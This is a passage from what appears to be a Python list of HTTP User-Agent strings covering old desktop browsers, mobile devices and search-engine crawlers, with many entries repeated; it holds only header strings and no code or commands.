'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
